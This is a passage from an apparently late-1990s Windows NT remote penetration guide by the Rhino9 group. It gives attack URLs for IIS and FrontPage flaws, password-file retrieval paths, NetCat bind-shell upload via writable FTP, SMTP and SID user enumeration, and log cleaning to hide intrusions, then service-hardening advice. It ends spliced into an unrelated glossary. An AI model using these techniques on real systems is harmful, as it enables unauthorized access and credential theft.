single command can be executed.
2) There is no file abracadabra.bat in /scripts directory,
but .bat extension is mapped to C:\WINNT35\System32\cmd.exe
In a similar situation with the Netscape server, actual
.bat file must exist.
3) In case a hacker enters a command like "time" or "date" as
COMMAND[N], nothing will be logged by IIS Web server.
In a similar situation with the Netscape server, the error
log will have a record about remote IP and command you
trying to execute.
<End Quote>
If you are having trouble seeing exactly what is going on in this situation,
an intruder could use the above attack sequence to create and execute files
server side. This could have really drastic results depending on the skill
level and intent of the attacker. Luckily, most production environments are
no longer running versions of Internet Information Server old enough to
still be affected by this flaw.
Shortly after the bat/cmd flaw was fully investigated and documented,
another bug hit the community. Again, lucky for us this flaw also only
affects older version of Internet Information Server. This flaw, called the
'double dot bug' gave the visitor to the website the ability to break out of
the sanctioned webroot directory and browse or download files. Obviously the
end server could contain sensitive information that exists outside of the
designated webroot, and this simple flaw would give an outsider access to
that information. The command is executed as a URL, and its structure is as
follows:
http://www.someserver.com/..\..
As if the double dot bug was not enough, another variant on that flaw
appeared shortly after. This newly found flaw would give an intruder the
ability to execute scripts on the target machine. Due to the fact that this
new flaw is a variant of the double dot bug, the scripts in question could
exist outside of the webroot. This attack is also structured as a URL, and
is issued as follows:
http://www.someserver.com/scripts..\..\scriptname
WindowsNT installations of Internet Information Server require some type of
account to be used for authentication on the box for public visits. If this
account was not present in some fashion, every visitor to the site would be
required to present credentials. This would not be a very effective or
efficient way to present a public website. On Internet Information Server,
the account to be used is the IUSR_<computername> account. This account and
its accompanying password are created during installation. By default, this
account is a member of the everyone group, and by default the everyone group
has read access to everything on an NT drive. This fact coupled with the
above mentioned flaw's ability to break out of the webroot could lead to
major security breaches.
For a short while, it seemed that new URL related attack types seemed to pop
up every week. Following the scripts flaw above was another script related
bug that would allow an intruder to create a file on the target machine, and
possibly execute the file after creation. The new attack URL structure was:
http://www.someserver.com/scripts/script_name%0A%0D>PATH\target.bat
When this flaw first appeared, many people in the community ignored it and
gave it no serious thought. Soon after, a public release was made
documenting the exact steps an intruder would take to obtain a copy of the
repair SAM. The release including the above URL flaw as part of its overall
attack.
When Microsoft released Internet Information Server 3.0, it brought active
server page technology to the world. This release also opened the gates to a
new stream of flaws that affected IIS and NT4.
Active server pages brought simple, dynamic webpages to the Microsoft world.
Active Server Pages can be used in many different ways, such as database
connectivity, indexing and searching documents, authentication, and simple
graphics rotation for those annoying advertisement banners.
The concept of active server pages was actually pretty creative. The HTML
code would include imbedded script code that would execute server side and
produce dynamic content for the end user. With this new technology widely
available, it was not long until the first flaw was released to the public.
This first flaw, dubbed the 'dot flaw', would allow an intruder to actually
view the script without the server executing it.
A standard URL structure would look like this:
http://www.genericserverhere.com/default.asp
The attack URL structure would look like this:
http://www.genericserverhere.com/default.asp.
This attack would display the unexecuted code in the attackers web browser.
Needless to say, the script code could contain sensitive information, such
as a username/password combination to remotely connect to a database. This
type of information, among other things, is not something that one would
want an intruder getting their hands on.
When a fix was released for the dot flaw, variants of the flaw that defeated
the fix were also released. The first of the variants was the %2e flaw. %2e
is the hex equivelant of a period, thus showing that the fix that was made
available was not incredibly robust. Variants of this flaw continue to show
up on occasion. Because all of the variants perform the same exact end
results, they will not be discussed in detail. Some of the known attack URL
structures are listed below:
http://www.someserver.com/default%2easp
http://www.someserver.com/default%2e%41sp
http://www.someserver.com/default.asp::$DATA
http://www.someserver.com/shtml.dll?<filename>.asp
Everyone involved in the security community has a feeling that these will
not be the last script displaying methods to emerge in the near future. As
these scripts become more and more commonplace, they will contain more and
more sensitive information. These simple exploits could lead to an intruder
easily gleaning sensitive information.
When it comes to gleaning information from IIS, perhaps one of the most
popular and easiest of the attacks is the Index Server attack. Index Server
is a small compact search engine module that was included with Internet
Information Server version 3.0. This module gives webmasters the ability to
provide visitors to their site with a searchable interface for searching the
contents of the website. Although there are no inherent problems with Index
Server itself, problems arise out of a lack of education on the part of the
admin or webmaster. Index Server is not difficult to understand, setup and
mantain, although its use of catalogs and scopes can lead to an admin
misconfiguring the permissions and searchable content. This misconfiguration
could lead to an intruder gaining access to information he would normally
have a much more difficult time getting.
The default URL structure for this attack would be:
http://www.someserver.com/samples/search/queryhit.htm
This path reflects the default path to the sample pages that ship with
Internet Information Server. If this path is not a valid path, the intruder
could still click on that helpful little "Search This Site" link to access
the same information. Once the intruder successfully reaches the html
document in question, he will be presented with a webpage containing a form
field. This form field is where a visitor to your site would normally input
the information he wished to search for. An intruder could use a filename
search string such as:
#filename=*.txt
This would instruct Index Server to search through its catalog of indexed
data for any files ending with that file extension. Keep in mind that this
file extension is not limited to extensions that Index Server understands.
If Index Server encounters a file type it does not understand, it will treat
it as a binary and index the filename, extensions, date, and other
attributes. This means that an intruder could search for anything, including
*._, which could bring up the repair sam. The interesting thing about Index
Server is that unlike other full blown internet search engines, Index Server
will not display a file for which the requester does not have permission to
access. In other words, if Index Server returns the fact that it found a
file, then the file is accessable.
Another favorite default function an intruder would attempt to access is
Internet Information Servers web admin interface. In a default installation
of IIS, the web admin interface resides in the 'iisadmin' sub directory of
the web root, which means the URL attack structure would be:
http://www.someserver.com/iisadmin
If the admin has somehow misconfigured the permissions on this interface,
then an intruder could gain unauthorized access to the web server with
administrative functions. If successful, the intruder would be presented
with an HTML interface to an administrative tool. Because of the way IIS and
NT handles permissions, it is possible for the intruder to gain access to
the interface but not have the proper permissions to actually do anything
with it. So if you are auditing your own network, be sure to attempt a minor
change to ensure that there is a problem.
In late '97 and early '98 an enormous amount of webserver hacks were
performed. A large number of those hacks had one thing in common: the
webservers were running Microsoft Frontpage Extensions. Frontpage Extensions
are little 'web bots', if you will, that allow the author or administrator
of the website to perform complex or involved tasks with relative ease.
The problem with the Frontpage Extensions was that a default Frontpage
installation was not secure, especially in the unix version. An alarming
number of the servers supporting these extensions had been left unpassworded
or enabled administrative rights to the Everyone group. Again, the everyone
group means everyone, including anonymous connections.
We will dive into the first Frontpage attack with a discussion of an attack
using the actual Frontpage client software.
A server that supports FrontPage will have a number of working directories
that begin with the letters '_vti'. Doing a search at any of the popular
search engines for any of the default frontpage directories would result in
a large number of returns from the engine. An intruder could then get
comfortable and attempt a simple, repetative attack against these servers.
The attack is executed as follows:
1- Open your own personal copy of FrontPage
2- Goto the "Open frontpage web" dialogue box
3- Put in the URL or IP of the server you wish to attack
If the server is unpassworded or if permission is granted to the everyone
group, Frontpage will open the remote site for you, and allow you to alter
it. The attack really is this simple. If the extensions are set up
correctly, a username/password dialogue would appear. The intruder may
attempt some basic combinations such as administrator/password, but chances
are the intruder won't bother, and will move on.
An intruder could also use the same "open frontpage web" trick to get a
complete user listing. This could be used in brute force attacks later.
Documentation circulated explaining that to stop the gleaning of usernames
this way, one should create a restriction group as FP_www.yourdomain.com:80.
This new restriction group indeed works, unless the intruder uses the IP
address of your server instead of the domain name.
Some other tricks that can be done with FrontPage support is attempting to
grab the Frontpage password file. Frontpage normally stores the password in
the _vti_pvt directory, with the name service.pwd. An intruder could attempt
to execute the following URL:
http://www.someserver.com/_vti_pvt
If permissions are not setup correctly and directory browsing is allowed,
the intruder would get a listing of the files in that directory, including
service.pwd. Usually the administrator will pay some attention to the
installation and security of the site and restrict access to that directory.
Although this is a good initial step, always remember how NTFS works.
Depending on the configuration of NTFS, a user may still gain access to the
password file even though access to the parent folder has been denied. In
this type of situation, the intruder would simply issue the full path to the
file in the URL, such as:
http://www.someserver.com/_vti_pvt/service.pwd
Although the frontpage password file is encrypted, it is encrypted with
standard DES, so any DES cracker can glean it after proper file doctoring.
An intruder may also poke around the other _vti directories, as sometimes
these can hold sensitive information. After the username is known and the
password has been cracked, the intruder could then re-connect with his copy
of Frontpage and provide it with the credentials, or the credentials could
be used in other ways, such as mapping a network drive, provided the same
username/password combination would work in that context.
(NOTE: Service.pwd is not the only known password file name. Authors.pwd,
admin.pwd, users.pwd and administrators.pwd have also been seen.)
Of the Frontpage related exploits, the binary ftp exploit is probably
considered to be the most sophisticated, even though it's also extremely
easy to accomplish. The binary attack would allow an intruder to execute any
binary via frontpage extensions. The attacker must find a server that
supports frontpage and also supports FTP anonymous writable. After
connecting to the server via FTP, the intruder would create a directory
named _vti_bin. He would then upload whichever executable he wishes to run
into the newly created directory. Once the executable file has been
uploaded, the intruder would issue the following URL:
http://www.someserver.com/_vti_bin/uploaded_file
The server will then be more than happy to execute the file for the visitor
of the site.
Shortly after the binary attack made its rounds, the _vti_cnf bug was found.
This would allow an intruder to view all files in a certain directory. By
replacing the index.html with _vti_cnf, the intruder would see all files in
that directory, and possibly gain access to them. The attack is issued as
follows:
Standard structure - http://www.someserver.com/some_directory_structure/index.html
Attack structure - http://www.someserver.com/some_directory_structure/_vti_cnf
It may seem as though there could be countless variants of the same attack
type that could issue similar results. Sadly enough, that is a somewhat
accurate statement. Many of these flaws are found by people playing with
variants of previous flaws, but not all flaws affecting NT web services come
from Internet Information Server.
There are other web server software packages that will run on NT, like the
well known Apache web server. Of course, with these third party web server
packages and seperately released scripts that run on these third party
packages, new flaws are bound to show up.
Webcom Datakommunikation released a cgi script that would allow visitors of
a website to sign a guestbook. The name of the cgi script is wguest.exe. By
issuing the proper commands, this little cgi script allows an attacker to
view any text file on your server.
The form page where a visitor would sign the guestbook contains a number of
hidden fields. One of these hidden input fields is as follows (as reported
by David Litchfield):
input type="hidden" name="template"
value="c:\inetpub\wwwroot\gb\template.htm">
or
input type="hidden" name="template" value="/gb/template.htm">
Template.htm here is the file that will be displayed by wguest.exe after the
user has entered his information. To exploit this an attacker views the
source and saves the document to his desktop and edits this line by changing
the path to whatever file he wants to view, eg.
input type="hidden" name="template"
value="c:\winnt\system32\$winnt$.inf">
[If an unattended install was done the admin password can be gleaned from
this file]
He then clicks on "Submit" and then wguest.exe will display this file. This
was not tested with pwl files. However the attacker must know the exact path
of the file he wishes to view.
Another 'generic' HTTPD exploit involves a third party webserver product
that runs on WindowsNT called Sambar Server. The following is a direct quote
from posting:
<quote>
It is possible to view the victim's HDD. Asume you find a computer running
Sambar Server by searching the Internet with these key-words: +sambar
+server +v4.1
If you find a site like: http://www.site.net/ then do a test, run a little
perl script...
http://www.site.net/cgi-bin/dumpenv.pl
Now you see the complete environment of the victims computer, including his
path. Now you can try to login as the administrator by this url:
http://www.site.net/session/adminlogin?RCpage=/sysadmin/index.stm
The default login is: admin and the default password is blank. If the victim
hasn't changed his settings, you now can control his server. Another feature
is to view the victims HDD. If you were able to run the perl script you
should also be able (in most cases) to view directory's from his path. Most
people have c:/program files and c:/windows in the path line, so what you
can do is:
http://www.site.net/c:/program files/sambar41
<end quote>
The next small item in this section has to do with Netscape Enterprise
Server. Some versions of the software react to the ?PageServices parameter
by allowing users access to a directory listing. http://www.site.net/?PageServices
is how this would be done.
Finally a word on FTP. FTP can be a secure thing. Tons of people will argue
that platforms and version dependancy make it more secure, and for the most
part this is true. Most seasoned security profressionals will tell you that
version and platform do not amount to anything without an educated end
admin. We are adding this quick note in here due to the number of servers
Rhino9 has been able to penetrate based on FTP permissions. Some admins will
not notice, or understand, the "Anonymous world writable" privs on their
webserver. Rhino9 has questioned and worked its way into an entire network
via one misconfigured FTP server.
It is not difficult to upload NetCat via anon-ftp-writable to a server,
execute it via URL, and bind it to a port. From that point on, you have a
remote 'shell' on the NT box. By connecting to that remote NetCat bind, keep
in mind that all command line functions issued from that shell seem to be
sent from THAT SHELL, with the NetCat binding running in the context of an
internal user.
=
MISCELLANEOUS INFORMATION GATHERING AND PENETRATION TECHNIQUES
=
(As with any type of security related document that attempts to encompass
many different topics, some topics will seem out of place among the rest of
them. This section deals with different techniques that really did not fit
anywhere else in the document. Excuse the somewhat fragmented nature of this
section.)
If there is one product that Rhino9 as a team has spent time tearing apart,
it is WinGate. The first problem encountered with WinGate was the ability to
'bounce' through a WinGate with all subsequent connections appearing to come
from the WinGate itself. This little flaw was extremely easy to take
advantage of. One would telnet to the WinGate port and be presented with a
prompt such as:
WinGate>
At this prompt, you could issue a seperate telnet command or take advantage
of the WinGates SOCKS ability to establish other connections. While the
developer of this software product was quick to release fixes and bulletins
for this, the next release also had problems.
In a default installation of WinGate v2.1, the WinGate machine was
configured with a logging service. The logging service listens on port 8010
of the WinGate machine. By establishing an HTTP connection to this port, a
possible intruder would be presented with two general feeds:
"Connection Cannot Be Established"
Or, the intruder would get a listing of the wingate machines hard drive.
Keep in mind, that this is a default install and can easily be fixed by
chaning the default install configuration.
As Exchange server became a more and more popular mail server package, flaws
began to appear. The first flaw to emerge was a password caching problem
within the architecture of Exchange. This is a quote directly from the
original posting:
<quote>
Create a user xyz on your NT domain with an Exchange 5.0 server with POP3
service. Set xyz's password to a1234. Things work fine so far. Now change
xyz's password to b5678. You will find that POP3 mail clients can log in
using either password a1234 or b5678 for user xyz. Now change the password
to something else. You will find that a POP3 client (or direct telnet to
port 110) will allow you to log in as xyz using any of the three passwords.
They all work. The Exchange 5.0 service POP3 connector caches passwords in a
non-hashing mechanism so that all the passwords remain active. This does not
affect the new web page interface to get your mail which uses a different
authentication. Nor does it affect NT logons. In non-POP3 logins, the
passwords are not cached (except NNTP and LDAP). As you can see, the caching
problem can be very serious in certain environments.
<end quote>
Another technique that an intruder could use to gather information is based
on the SMTP port of a target mail server. In order to be SMTP compliant and
have the ability to fully interact with other mail entities on the internet,
NT based SMTP mail servers understand the verify feature. By establishing a
telnet session to the SMTP port of the mail server, an intruder could issue
the verify command in conjunction with a username. If the verify feature is
enabled, the server will tell the intruder if it is a valid username or not.
The attack command would appear as such:
vrfy administrator (would verify if a user named administrator existed)
On some mail systems, the intruder would be required to go through the HELO
sequence first, but this is extremely trivial. Needless to say, this could
lead to an intruder gathering a list of valid usernames to use in other
attacks.
=
FINAL WORDS
=
The authors of this document hope that you have enjoyed reading it and that
you have learned something from it. The authors would also like to remind
the readers that we wish to keep this document current. Planning future
releases of this document, with up to date information allows us to begin
keeping a publicly available living record that administrators and security
professionals can use. Send your information gathering and remote
penetration techniques to neonsurge@hotmail.com. As new versions of this
document become available, notice will go out on such lists as NTBugTraq.
The home of the document itself will be at the Rhino9 website
(http://rhino9.ml.org),
The authors of this document have three other documents planned for release
in the near future, all of them part of the NT WarDoc series. We have an
indepth Denial of Service paper in the works, Local Penetration Techniques
paper, and a paper dealing with techniques one could use to gaurd against
the topics of the other papers. We look forward to feedback from the
community.
=
APPENDIX A: THE NET COMMAND
=
Below is a listing of all Net commands and their functions:
Net Accounts: This command shows current settings for password, logon
limitations, and domain information. It also contains options for updating
the User accounts database and modifying password and logon requirements.
Net Computer: This adds or deletes computers from a domains database.
Net Config Server or Net Config Workstation: Displays config info about the
server service. When used without specifying Server or Workstation, the
command displays a list of configurable services.
Net Continue: Reactivates an NT service that was suspended by a NET PAUSE
command.
Net File: This command lists the open files on a server and has options for
closing shared files and removing file locks.
Net Group: This displays information about group names and has options you
can use to add or modify global groups on servers.
Net Help: Help with these commands
Net Helpmsg message#: Get help with a particular net error or function
message.
Net Localgroup: Use this to list local groups on servers. You can also
modify those groups.
Net Name: This command shows the names of computers and users to which
messages are sent on the computer.
Net Pause: Use this command to suspend a certain NT service.
Net Print: Displays print jobs and shared queues.
Net Send: Use this command to send messages to other users, computers, or
messaging names on the network.
Net Session: Shows information about current sessions. Also has commands for
disconnecting certain sessions.
Net Share: Use this command to list information about all resources being
shared on a computer. This command is also used to create network shares.
Net Statistics Server or Workstation: Shows the statistics log.
Net Stop: Stops NT services, cancelling any connections the service is
using. Let it be known that stopping one service may stop other services.
Net Time: This command is used to display or set the time for a computer or
domain.
Net Use: This displays a list of connected computers and has options for
connecting to and disconnecting from shared resources.
Net User: This command will display a list of user accounts for the
computer, and has options for creating a modifying those accounts.
Net View: This command displays a list of resources being shared on a
computer. Including netware servers.
**Special note on DOS and older Windows Machines: The commands listed above
are available to Windows NT Servers and Workstation. DOS and older Windows
clients have these NET commands available:
Net Config
Net Diag (runs the diagnostic program)
Net Help
Net Init (loads protocol and network adapter drivers.)
Net Logoff
Net Logon
Net Password (changes password)
Net Print
Net Start
Net Stop
Net Time
Net Use
Net Ver (displays the type and version of the network redirector)
Net View
=
APPENDIX B: AN EXAMPLE OF THE SID TOOLS IN USE
=
Below is an example of the SID Tools in action, quoted directly from the
public posting about this tool:
This flaw works with the User2Sid and Sid2User utilities. The utilities make
function of the LookupAccountName and LookupAccountSid WIN32 Functions.
These functions must be executed by a user with EVERYONE access, not very
hard to accomplish. Here's what happens:
1) Looking up a SID of any domain account, for example Domain Users
user2sid "domain users"
S-1-5-21-201642981-56263093-24269216-513
Now we know all the subauthorities for the current domain. Domain accounts
only differ by the last number of the SID, called a RID.
2) Looking up the built-in administrator name (RID is always 500)
sid2user 5 21 201642981 56263093 24269216 500
Name is SmallUser
Domain is DomainName
Type of SID is SidTypeUser
Now it is possible to look up all the domain accounts from the very first
one (RID 1000 for the first account, 1001 for the second and so on, RIDs are
never used again for the current installation).
sid2user 5 21 201642981 56263093 24269216 1000
sid2user 5 21 201642981 56263093 24269216 1001
...
Remember that the anonymous account is also part of the Everyone group. It
also happens that the anonymous account is not audited by the logon/logoff
feature.
Below is an example of what you can learn provided the netbios ports are
open (the listing is fictional).
nslookup www.xyz.com
Non-authoritative answer:
Name: www.xyz.com
Address: 131.107.2.200
net use \\131.107.2.200\ipc$ "" /user:""
The command completed successfully.
user2sid \\131.107.2.200 "domain users"
S-1-5-21-201642981-56263093-24269216-513
Number of subauthorities is 5
Domain is XYZ_domain
Length of SID in memory is 28 bytes
Type of SID is SidTypeGroup
sid2user \\131.107.2.200 5 21 201642981 56263093 24269216 500
Name is XYZAdmin
Domain is XYZ_domain
Type of SID is SidTypeUser
sid2user \\131.107.2.200 5 21 201642981 56263093 24269216 1000
Name is
Domain is XYZ_domain
Type of SID is SidTypeDeletedAccount
sid2user \\131.107.2.200 5 21 201642981 56263093 24269216 1001
Name is Simpson
Domain is XYZ_domain
Type of SID is SidTypeUser
sid2user \\131.107.2.200 5 21 201642981 56263093 24269216 1112
LookupSidName failed - no such account
Default NT Install SID's are:
DOMAINNAME\ADMINISTRATOR
S-1-5-21-917267712-1342860078-1792151419-500 (=0x1F4)
DOMAINNAME\GUEST
S-1-5-21-917267712-1342860078-1792151419-501 (=0x1F5)
Built-In Global Groups
DOMAINNAME\DOMAIN ADMINS
S-1-5-21-917267712-1342860078-1792151419-512 (=0x200)
DOMAINNAME\DOMAIN USERS
S-1-5-21-917267712-1342860078-1792151419-513 (=0x201)
DOMAINNAME\DOMAIN GUESTS
S-1-5-21-917267712-1342860078-1792151419-514 (=0x202)
Built-In Local Groups
BUILTIN\ADMINISTRATORS S-1-5-32-544 (=0x220)
BUILTIN\USERS S-1-5-32-545 (=0x221)
BUILTIN\GUESTS S-1-5-32-546 (=0x222)
BUILTIN\ACCOUNT OPERATORS S-1-5-32-548 (=0x224)
BUILTIN\SERVER OPERATORS S-1-5-32-549 (=0x225)
BUILTIN\PRINT OPERATORS S-1-5-32-550 (=0x226)
BUILTIN\BACKUP OPERATORS S-1-5-32-551 (=0x227)
BUILTIN\REPLICATOR S-1-5-32-552 (=0x228)
Special Groups
\CREATOR OWNER S-1-3-0
\EVERYONE S-1-1-0
NT AUTHORITY\NETWORK S-1-5-2
NT AUTHORITY\INTERACTIVE S-1-5-4
NT AUTHORITY\SYSTEM S-1-5-18
=
APPENDIX C: RELATIONAL LOCATIONS OF DEFAULT IIS STRUCTURES
=
C:\InetPub\wwwroot <Home>
C:\InetPub\scripts /Scripts
C:\InetPub\wwwroot\_vti_bin /_vti_bin
C:\InetPub\wwwroot\_vti_bin\_vti_adm /_vti_bin/_vti_adm
C:\InetPub\wwwroot\_vti_bin\_vti_aut /_vti_bin/_vti_aut
C:\InetPub\cgi-bin /cgi-bin
C:\InetPub\wwwroot\srchadm /srchadm
C:\WINNT\System32\inetserv\iisadmin /iisadmin
C:\InetPub\wwwroot\_vti_pvt /_vti_pvt
C:\InetPub\wwwroot\samples\Search\QUERYHIT.HTM Internet Information Index
Server sample
C:\Program Files\Microsoft FrontPage\_vti_bin
C:\Program Files\Microsoft FrontPage\_vti_bin\_vti_aut
C:\Program Files\Microsoft FrontPage\_vti_bin\_vti_adm
C:\WINNT\System32\inetserv\iisadmin\htmldocs\admin.htm /iisadmin/isadmin
Frontpage specific files and their functions:
/_vti_inf.html Ensures that frontpage server extensions are
installed.
/_vti_pvt/service.pwd Contains the encrypted password files. Not used on
IIS and WebSite servers.
/_vti_pvt/authors.pwd On Netscape servers only. Encrypted. Names and
passwords of authors.
/_vti_pvt/administrators.pwd
/_vti_log/author.log If author.log is there it will need to be cleaned to
cover an intruders tracks.
=
APPENDIX D: THE SERVICES
=
I have received countless pieces of mail regarding the NT services. People
are asking what they do and should certain ones be disabled. Whats follows
is a list of the services, an explanation of each one, and recommendations
for setup. -NeonSurge
ALERTER: Relies on NetBIOS over TCP/IP for network communication. This
service allows a user to receive messages from other machines. These
messages could be warnings or some type of pre-determined network
information. I recommend disabling the Alerter service on machines due to
its NetBIOS dependancy and the fact that it is hardly ever used.
CLIPBOOK SERVER: Relies on NetBIOS over TCP/IP for network communication.
This server service allows the contents of the clipboard to be shared over a
network. Few use it, and it should be disabled due to the ability of a
remote intruder possible gleaning information from it.
COMPUTER BROWSER: The Computer Browser service allows one to view available
network resources by browsing via Network Neighborhood. When active on a
server, the server will register its name through a NetBIOS broadcast or
directly to a WINS server. I recommend disabling this service.
DHCP CLIENT: This service should be set to automatic if the machine is a
dhcp client, if not, disable it.
DIRECTORY REPLICATOR: This service allows NT systems to import and export
directory contents. If you content replication is not needed, disable this
service.
EVENT LOG: I recommend always using this service because it is the service
responsible for logging activity on the server, including security activity.
LICENSE LOGGING SERVICE: Used to track use of licenses by different
applications, it does not have any serious impact on the network and should
be set to automatic (which is the default setting).
MESSENGER SERVICE: Relies on NetBIOS over TCP/IP for network communication.
Similar to the Alerter service in both design and function. I recommend
stopping this service to prevent username enumeration via NBTSTAT commands.
NET LOGON: This service is used by both Server and Workstation to provide
for user authentication. TSERhis service is said to be required at all times
and runs as the built in SYSTEM user.
NETWORK DDE and DDE DSDM: These service provide dynamic data exchange. DDE
is used for such applications as Chat (thats important!), and other
applications that may require this type of functionality. These services are
considered to be a moderate risk due to their TCP connection accepting
states.
NETWORK MONITOR AGENT: Network Monitor Agent is used to monitor, or sniff,
the traffic passing through a network adapter card. If the SMS version of
this software is in use, an administrator can remotely monitor traffic on
other network adapter cards.
NT LM SECURITY SUPPORT PROVIDER: This service is present to help with
backwards compatibility and authentication with older software packages.
PLUG AND PLAY: Used to configure PnP devices.
REMOTE PROCEDURE CALL LOCATOR AND SERVICES: RPC is a protocol that is used
to encapsulate fucntion calls over a network. Its defualt configuration,
automatic, is standard and should be left alone. This service is considered
to pose a high security risk, but the dependancies existing on this service
are too great to disable it.
ROUTING AND REMOTE ACCESS SERVICE: This is an add-on service that enhances
the functionality of WindowsNT. If you are using a modem to dial-out of your
NT system, this service should be set to automatic. If you are using its
routing features, also set it to automatic.
SCHEDULE: This service allows an application to be executed at a
pre-specified time and date. This can pose a serious security threat as this
service can be used to start applications under the SYSTEM context.
SERVER: Used as the key to all server-sdie NetBIOS applications, this
service is somewhat needed. Without this service, some of the administrative
tools, such as Server Manager, could not be used. If remote administration
or access to the machine is not needed, I highly recommend disabling this
service. Contrary to popular belief, this service is NOT needed on a
webserver.
SPOOLER: The spooler service is used to accept requests for print jobs from
clients, and to allow the local system to spool jobs to a network printer.
This service should be set to automatic.
TCP/IP NETBIOS HELPER: This service helps and enhances NBT and the Net Logon
service. Because the Net Logon service should be set to automatic, so should
this service.
TELEPHONY SERVICE: This service is used to manage telephony drivers and the
properties for dialing. On a system that does not use any type of telephony
or RAS devices should have this service disabled.
UPS: This service is used in serial communication with an Uninterruptible
Power Supply.
WORKSTATION: This service allows for outbound NetBIOS connections. Because
it is used in outbound connections only, it is normally not a security risk
and should be set to automatic.
=
APPENDIX E: URL's
=
Sid Tools: http://www.technotronic.com/microsoft.html
Eudpass: http://rhino9.ml.org/wardoc
1nf0ze: http://rhino9.ml.org/wardoc
FireFTP: http://rhino9.ml.org/wardoc
Grinder: http://rhino9.ml.org/software
Glide: http://rhino9.ml.org/wardoc
John The Ripper (DES Cracker): http://www.false.com/security/john/index.html
WS_FTPBug: http://rhino9.ml.org/wardoc
L0phtCrack (NT Password Cracker): http://www.l0pht.com
PWDump: http://rhino9.ml.org/wardoc
NAT: http://www.technotronic.com/microsoft.html
=
APPENDIX F: THE LMHOSTS FILE
=
Although most security professionals are used to working with a HOSTS file,
WindowsNT actually uses two text files to resolve hostnames to their
adresses. WindowsNT still uses a HOSTS file, but it also uses an LMHOSTS
file.
Much like a HOSTS file, an LMHOSTS is a flat, sequential text file that is
used to resolve computer names (NetBIOS) to addresses. The LMHOSTS file also
allows one to use keywords, which gives it greater functionality and
flexibility than a HOSTS file.
The keywords that the LMHOSTS file uses are #PRE, #DOM:domain, #include
virtualname, #BEGIN_ALTERNATE, and #END_ALTERNATE. If something follows a
hash mark that is not one of these keywords, it is treated as a remark.
#PRE: If this keyword follows an entry in an LMHOSTS file, it tells
WindowsNT to pre-load that entry into the name cache. This allows the
windows system to resolve the name much quicker.
#DOM: The #DOM tag entry causes WindowsNT to associate that entry with
whatever domain you specify (i.e. #DOM:accounting). This helps NT resolve
certain names more efficiently because it does not have to consult routing
tables to find out which domain the entry belongs in.
#INCLUDE: This entry tells WindowsNT where to look for other LMHOSTS files
that reside on other machines. When using this function, one should specify
the UNC path to the other LMHOSTS file. The #BEGIN_ALTERNATE and #END_ALTERNATE
are used in conjunction with the #INCLUDE tag and should appear before and
after the #INCLUDE tag.
|
Terminology
Abuse
To maltreat; injure; revile; reproach; vilify; vituperate; asperse;
traduce; malign.
To use ill; to maltreat; to act injuriously to; to punish or to tax
excessively; to hurt; as, to abuse prisoners, to abuse one's powers,
one's patience.
Abuse of Privilege
To use wrongly or improperly. An unjust or wrongful practice. When a
user performs an action that they should not have, according to
organizational policy or law.
Access Control Lists
Rules for packet filters (typically routers) that define which packets
to pass and which to block.
Access Router
A router that connects your network to the external Internet.
Typically, this is your first line of defence against attackers from the
outside Internet. By enabling access control lists on this router,
you'll be able to provide a level of protection for all of the hosts
"behind" that router, effectively making that network a DMZ instead of
an unprotected external LAN.
Algorithm
A step-by-step problem-solving procedure, especially an established,
recursive computational procedure for solving a problem in a finite
number of steps.
Application-Level Firewall
A firewall system in which service is provided by processes
that maintain complete TCP connection state and sequencing. Application
level firewalls often re-address traffic so that outgoing traffic
appears to have originated from the firewall, rather than the internal
host.
Authentication
The process of determining the identity of a user that is attempting to
access a system.
Authentication Token
A portable device used for authenticating a user. Authentication tokens
operate by challenge/response, time-based code sequences, or other
techniques. This may include paper-based lists of one-time passwords.
Authorization
The process of determining what types of activities are permitted.
Usually, authorization is in the context of authentication: once you
have authenticated a user, they may be authorized different types of
access or activity.
B1FF
The most famous pseudo, and the prototypical newbie. Articles from B1FF
feature all uppercase letters sprinkled liberally with bangs, typos,
'cute' misspellings (EVRY BUDY LUVS GOOD OLD BIFF CUZ HE"S A K00L DOOD
AN HE RITES REEL AWESUM THINGZ IN CAPITULL LETTRS LIKE THIS!!!), use
(and often misuse) of fragments of talk mode abbreviations, a long sig
block (sometimes even a doubled sig), and unbounded naivete. B1FF posts
articles using his elder brother's VIC-20. B1FF's location is a mystery,
as his articles appear to come from a variety of sites. However, BITNET
seems to be the most frequent origin. The theory that B1FF is a denizen
of BITNET is supported by B1FF's (unfortunately invalid) electronic mail
address: B1FF@BIT.NET.
[1993: Now It Can Be Told! My spies inform me that B1FF was originally
created by Joe Talmadge , also the author of the infamous and
much-plagiarized "Flamer's Bible". The BIFF filter he wrote was later
passed to Richard Sexton, who posted BIFFisms much more widely. Versions
have since been posted for the amusement of the net at large. --ESR]
Bastion Host
A system that has been hardened to resist attack, and which is
installed on a network in such a way that it is expected to potentially
come under attack. Bastion hosts are often components of firewalls, or
may be "outside" web servers or public access systems. Generally, a
bastion host is running some form of general purpose operating system
(e.g., Unix, VMS, NT, etc.) rather than a ROM-based or firmware
operating system.
Baud
Bits per second. One baud is one bit per second. Hence kilobaud or
Kbaud, thousands of bits per second. The technical meaning is 'level
transitions per second'; this coincides with bps only for two-level
modulation with no framing or stop bits. Most hackers are aware of these
nuances but blithely ignore them. Historical note: 'baud' was originally
a unit of telegraph signalling speed, set at one pulse per second. It
was proposed at the November, 1926 conference of the Comite' Consultatif
International Des Communications Te'le'graphiques as an improvement on
the then standard practice of referring to line speeds in terms of words
per minute, and named for Jean Maurice Emile Baudot (1845-1903), a
French engineer who did a lot of pioneering work in early teleprinters.
Binary
Any file format for digital data encoded as a sequence of bits but not
consisting of a sequence of printable characters (text). The term is
often used to describe for executable machine code or machine language
which is a set of instructions for a specific central processing unit,
designed to be usable by a computer without being translated. Binary:
Characterized by or consisting of two parts or components; twofold.
Boolean
Of or relating to a logical combinatorial system treating variables,
such as propositions and computer logic elements, through the operators
AND, OR, NOT, and XOR: a browser that supports Boolean searches. Of or
relating to a data type or variable in a programming language that can
have one of two values, true or false.
Byte
A unit of memory or data equal to the amount used to represent one
character; on modern architectures this is usually 8 bits, but may be 9
on 36-bit machines. Some older architectures used 'byte' for quantities
of 6 or 7 bits, and the PDP-10 supported 'bytes' that were actually
bitfields of 1 to 36 bits! These usages are now obsolete, and even 9-bit
bytes have become rare in the general trend toward power-of-2 word
sizes.
Challenge/Response
An authentication technique whereby a server sends an unpredictable
challenge to the user, who computes a response using some form of
authentication token.
Chroot
A technique under Unix whereby a process is permanently restricted to
an isolated subset of the filesystem.
Cracker
One who breaks security on a system. Coined ca. 1985 by hackers in
defense against journalistic misuse of hacker. An earlier attempt to
establish 'worm' in this sense around 1981-82 on Usenet was largely a
failure.
Use of both these neologisms reflects a strong revulsion against the
